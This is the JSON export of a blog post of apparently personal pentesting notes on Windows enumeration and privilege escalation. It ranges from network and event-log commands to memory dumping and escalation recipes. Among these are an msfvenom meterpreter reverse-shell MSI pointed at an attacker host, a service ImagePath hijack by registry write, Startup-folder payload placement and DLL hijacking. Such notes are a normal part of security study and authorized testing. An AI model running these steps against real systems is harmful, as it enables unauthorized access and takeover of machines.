{"id":2507,"date":"2021-01-30T09:37:50","date_gmt":"2021-01-30T08:37:50","guid":{"rendered":"https:\/\/andreas-klingler.de\/infosec\/?p=2507"},"modified":"2025-03-18T15:38:07","modified_gmt":"2025-03-18T14:38:07","slug":"extended-windows-system-enumeration","status":"publish","type":"post","link":"https:\/\/infosec.andreas-klingler.de\/?p=2507","title":{"rendered":"Extended Windows System Enumeration"},"content":{"rendered":"\n<ul class=\"wp-block-list\">\n<li><a href=\"https:\/\/andreas-klingler.de\/infosec\/?p=689\" data-type=\"post\" data-id=\"689\">See the Pow\u00ader\u00adShell post, espe\u00adcial\u00adly about the history<\/a><\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">Various<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Show who else is logged in.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">qwinsta<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Open the <strong>Event View\u00ader<\/strong> and search in the looks. Have&nbsp;fun!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Network enumeration<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Show the net\u00adwork con\u00adfig\u00adu\u00adra\u00adtion. Are there mul\u00adti\u00adple interfaces?<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">ipconfig \/all<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Rout\u00ading information<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">route print<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Show cur\u00adrent net\u00adwork con\u00adnec\u00adtions. After check\u00ading this com\u00admand: <span class=\"caps\">CHECK<\/span> all ports with the pre\u00advi\u00adous found&nbsp;ones!<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">netstat -ano<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Check the <span class=\"caps\">ARP<\/span> cache for oth\u00ader com\u00admu\u00adni\u00adca\u00adtion partners:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\"><code>arp -a<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Processes and services<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">If there are inter\u00adest\u00ading ser\u00advices, <a href=\"https:\/\/andreas-klingler.de\/infosec\/?p=2481\">refer to the ser\u00advices post<\/a>.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Dump memory<\/h2>\n\n\n\n<ol class=\"wp-block-list\">\n<li>Get the full taskname with<br><code>tasklist | findstr \/C:ftp<\/code><\/li>\n\n\n\n<li>Upload procdump[64].exe<\/li>\n\n\n\n<li>Dump process mem\u00ado\u00adry with<br><code>procdump64.exe -accepteula -ma ftp.exe<\/code><\/li>\n\n\n\n<li>Down\u00adload the gen\u00ader\u00adat\u00aded&nbsp;file<\/li>\n\n\n\n<li><\/li>\n<\/ol>\n\n\n\n<h2 class=\"wp-block-heading\">Windows Event Logging<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Events are stored in the \\system32\\winevt\\Logs directory.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The tool <a href=\"https:\/\/github.com\/Yamato-Security\/hayabusa\">hav\u00adabusa <\/a>is a pars\u00ader to analyse larg\u00ader evtx-Files.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">With Pow\u00ader\u00adShell wev\u00adtu\u00adtil, access can be made to the log\u00adging sys\u00adtem. (More exam\u00adples: See Inci\u00addent Response Train\u00ading March&nbsp;2025)<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">List logs:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">wevtutil el<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Search for something<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">wevtutil el | select-string security<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">Registry<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/andreas-klingler.de\/infosec\/?p=838\" data-type=\"post\" data-id=\"838\">See Win\u00addows Reg\u00adistry&nbsp;post<\/a><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Autoelevated<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Check if autoel\u00ade\u00advat\u00aded is active for installers:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">reg query HKLM\\Software\\Policies\\Microsoft\\Windows\\Installer<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">If it is set to&nbsp;1:<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>Cre\u00adate and upload payoad:<br><code>msfvenom -p windows\/meterpreter\/reverse_tcp lhost=$attackerip lport=4444 -f msi -o setup.msi<\/code><\/li>\n\n\n\n<li>Exe\u00adcute it:<br><code>msiexec \/quiet \/qn \/i C:\\Temp\\setup.msi<\/code><\/li>\n<\/ol>\n\n\n\n<p class=\"wp-block-paragraph\">Alter\u00adna\u00adtive: In an exist\u00ading ses\u00adsion, use <code>msf&gt; use windows\/local\/always_install_elevated<\/code><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Registry service escalation<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Check in a Pow\u00ader\u00adshell ses\u00adsion which groups have access to the reg\u00adistry key for services:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">Get-Acl -Path hklm:\\System\\CurrentControlSet\\services\\regsvc | fl<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Check if the cur\u00adrent user is in a group (<code>whoami \/priv<\/code>) which is list\u00aded in <em>Access<\/em> and has the <em>Full\u00adCon\u00adtrol<\/em> flag set. If&nbsp;yes:<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>Cre\u00adate an exe pay\u00adload from the ser\u00advice tem\u00adplate <a href=\"https:\/\/naturtrunken.de\/p151_git\/scripts\/privesc\/windows\/windows_service.c\">windows_service.c<\/a> and upload it <em>which should not run longer than 30 sec\u00adonds<\/em>. E.g. ele\u00advate the cur\u00adrent user or cre\u00adate a new one or place a file somehwere.<\/li>\n\n\n\n<li>Reg\u00adis\u00adter the file as a new ser\u00advice:<br><code>reg add HKLM\\SYSTEM\\CurrentControlSet\\services\\regsvc \/v ImagePath \/t REG_EXPAND_SZ \/d c:\\temp\\s64.exe \/f<\/code><\/li>\n\n\n\n<li>Start the ser\u00advice<br><code>sc start regsvc<\/code><\/li>\n<\/ol>\n\n\n\n<h2 class=\"wp-block-heading\">Autostart\/Autorun  exploitations<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Check if the user has write access to the autostart directory:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">icacls.exe \"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\"<\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">If the out\u00adput for the cur\u00adrent user con\u00adtains a F (=<em>Full access<\/em>), then copy a exe pay\u00adload into the direc\u00adto\u00adry. As soon as an admin logged in, the exe is executed.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Alter\u00adna\u00adtive: Check the reg\u00adistry for autostart pro\u00adgrams and check their direc\u00adto\u00adries as&nbsp;above.<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"caps\">DLL<\/span> exploitation<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">Check if a process tried to load to a <span class=\"caps\">DLL<\/span> which we can replace (or maybe the process tried dif\u00adfer\u00adent paths to load the <span class=\"caps\">DLL<\/span> and we can write\/create a <span class=\"caps\">DLL<\/span> before the <span class=\"caps\">DLL<\/span> it found usu\u00adal\u00adly). If yes, use <a href=\"https:\/\/naturtrunken.de\/p151_git\/scripts\/privesc\/windows\/windows_dll.c\">windows_dll.c<\/a> to cre\u00adate a <span class=\"caps\">DLL<\/span>. (<a href=\"https:\/\/andreas-klingler.de\/infosec\/?p=1284\" data-type=\"post\" data-id=\"1284\">Use PowerUp <\/a>to deter\u00admine location.)<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Var\u00adi\u00adous Show who else is logged in. qwin\u00ads\u00adta Open the Event View\u00ader and search in the looks. Have&nbsp;fun! Net\u00adwork enu\u00admer\u00ada\u00adtion Show the net\u00adwork con\u00adfig\u00adu\u00adra\u00adtion. Are there mul\u00adti\u00adple inter\u00adfaces? ipcon\u00adfig \/all Rout\u00ading infor\u00adma\u00adtion route print Show cur\u00adrent net\u00adwork con\u00adnec\u00adtions. After check\u00ading this com\u00admand: <span class=\"caps\">CHECK<\/span> all ports with the pre\u00advi\u00adous found&nbsp;ones! net\u00adstat \u2011ano Check the <span class=\"caps\">ARP<\/span>&nbsp;cache&nbsp;[\u2026]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"wp_typography_post_enhancements_disabled":false,"footnotes":""},"categories":[470,471],"tags":[53,24],"class_list":["post-2507","post","type-post","status-publish","format-standard","hentry","category-active-enum","category-privesc","tag-privilege-escalation","tag-windows"],"_links":{"self":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/2507","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2507"}],"version-history":[{"count":23,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/2507\/revisions"}],"predecessor-version":[{"id":4653,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=\/wp\/v2\/posts\/2507\/revisions\/4653"}],"wp:attachment":[{"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2507"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2507"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/infosec.andreas-klingler.de\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2507"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}